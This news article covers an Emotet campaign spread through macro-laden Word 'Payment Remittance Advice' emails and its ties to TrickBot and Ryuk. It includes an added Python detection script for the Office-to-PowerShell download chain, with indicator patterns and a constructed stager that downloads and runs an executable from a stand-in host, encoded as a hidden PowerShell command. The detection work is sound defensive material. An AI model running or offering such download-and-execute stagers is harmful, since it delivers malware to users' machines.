Cybersecurity researchers have identified a significant spam campaign spreading an Emotet banking Trojan via a malicious Word macro.
Researchers at Malwarebytes identified the campaign after noticing an uptick in command-and-control server activity alongside an email run distributing malicious messages in English, German, Italian, and Polish. The first emails were sent on September 16 with the subject line “Payment Remittance Advice”. Attackers commonly spoof financial organizations to convince users to open malicious Word documents and enable macros in order to view the document’s contents.
Trojan horses are malware disguised as harmless software. Attackers usually get them installed under false pretences, for instance through phishing campaigns that trick the user into believing the file serves a legitimate purpose. Once executed on the victim’s machine, the Trojan gives the attacker access to the system, which can then be used to steal valuable information for nefarious purposes.
The attackers have carefully crafted the campaign to maximize their chances of success. The subject lines are personalized and include the recipient’s name, which the attackers obtained by unknown means, so that an email is addressed ‘Joe Bloggs Payment Remittance Advice’.
The body of the email claims the attached document is a statement detailing a payment that is due. If the document is opened, the user is asked to click ‘Enable Content’ to accept a Microsoft license agreement, which the document claims is necessary to avoid Word features being disabled. The license text is a lure: ‘Enable Content’ does nothing except permit the embedded macro to run.
If content is enabled, the macro runs and launches a PowerShell script that downloads the Emotet payload from one of several compromised WordPress websites. Once installed, Emotet spreads laterally across the network and infects further devices.
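The infection chain above (Word document, macro, PowerShell, download from a compromised site) leaves a characteristic trace in process-creation telemetry: an Office process spawning a script host whose command line fetches and runs remote code, usually with a hidden window and a base64-encoded command. The following detection logic is an added example written for this page, not code from the article or from Malwarebytes. It scores constructed records that mirror a few Sysmon event ID 1 fields (ParentImage, Image, CommandLine); the field names, the stager text and the hostname are assumptions, and real log sources will differ.

```python
"""Score process-creation records for the macro -> PowerShell -> download chain.

Added example; not code from the article or from Malwarebytes. The records
below are constructed and mirror a few Sysmon event ID 1 fields (ParentImage,
Image, CommandLine). Field names, the stager text and the hostname are assumed.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Download-and-run primitives typical of macro-launched PowerShell stagers.
DOWNLOAD_PATTERNS = [r"net\.webclient", r"downloadstring", r"downloadfile",
                     r"invoke-webrequest", r"\biwr\b", r"\biex\b",
                     r"invoke-expression", r"start-bitstransfer", r"https?://"]
# Switches that hide the window or bypass policy; admin scripts rarely need them.
EVASION_PATTERNS = [r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noprofile\b",
                    r"-e(xecutionpolicy|p)\s+bypass"]
# -EncodedCommand and its aliases, followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Return (office_child, hits): whether an Office app spawned a script host,
    and the list of download/evasion indicators found in the command line."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    office_child = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    hits = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded command")
    # Search the decoded payload instead of the base64 blob, so encoding
    # neither hides the download primitives nor produces false matches.
    searchable = ENCODED_RE.sub(" ", cmd) + "\n" + (decoded or "")
    hits += [f"download: {p}" for p in DOWNLOAD_PATTERNS if re.search(p, searchable, re.I)]
    hits += [f"evasion: {p}" for p in EVASION_PATTERNS if re.search(p, cmd, re.I)]
    return office_child, hits


def is_macro_downloader(event: dict) -> bool:
    """Alert when an Office process launches a script host that fetches or hides remote code."""
    office_child, hits = score_event(event)
    return office_child and any(h.startswith(("download", "encoded")) for h in hits)


# Constructed stager text in the shape of the macro-launched downloader described above.
SAMPLE_STAGER = ("$c=New-Object Net.WebClient;"
                 "$c.DownloadFile('http://compromised-site.example/wp-content/u.exe',"
                 "\"$env:TEMP\\u.exe\");Start-Process \"$env:TEMP\\u.exe\"")
SAMPLE_ENCODED = base64.b64encode(SAMPLE_STAGER.encode("utf-16-le")).decode("ascii")

# Constructed records: one Emotet-style chain, one benign admin script, one
# Office-spawned shell with no download (worth a look, but not this alert).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -nop -ep bypass -enc {SAMPLE_ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo hello"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        office_child, hits = score_event(ev)
        verdict = "ALERT" if is_macro_downloader(ev) else "ok"
        print(f"{verdict:5} office_child={office_child} hits={hits}")
```

The parent/child pairing is the high-signal part: Word has no business launching PowerShell, so that relationship alone is worth a low-severity alert even when the command line is clean, and the download and evasion indicators raise it to an incident. Decoding the `-EncodedCommand` blob before matching matters because most stagers put the `Net.WebClient` call only inside the base64.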
The malware also hijacks the user’s email account and sends further spam emails to all individuals on the user’s contact list.
Emotet began as a banking Trojan that steals banking credentials, but it now also serves as a botnet and a loader for other malware. The Emotet operators are understood to sell access to infected machines to other threat groups, reportedly including the North Korea-based Lazarus Group, which some researchers have linked to Ryuk ransomware (an attribution that other researchers dispute).
In addition to Ryuk ransomware, Emotet is also used to distribute the TrickBot Trojan. The Emotet, TrickBot and Ryuk combination has been dubbed the ‘triple threat’ and has been used in devastating attacks on many businesses, cities, and other municipalities.
One of the most prominent examples occurred in Riviera Beach, Florida, where the attack encrypted files across the city’s systems and disabled many services. Riviera Beach officials paid a ransom of about $600,000 for the keys to decrypt the files. According to Malwarebytes, Ryuk earned its operators at least $3.8 million in the first six months of 2019.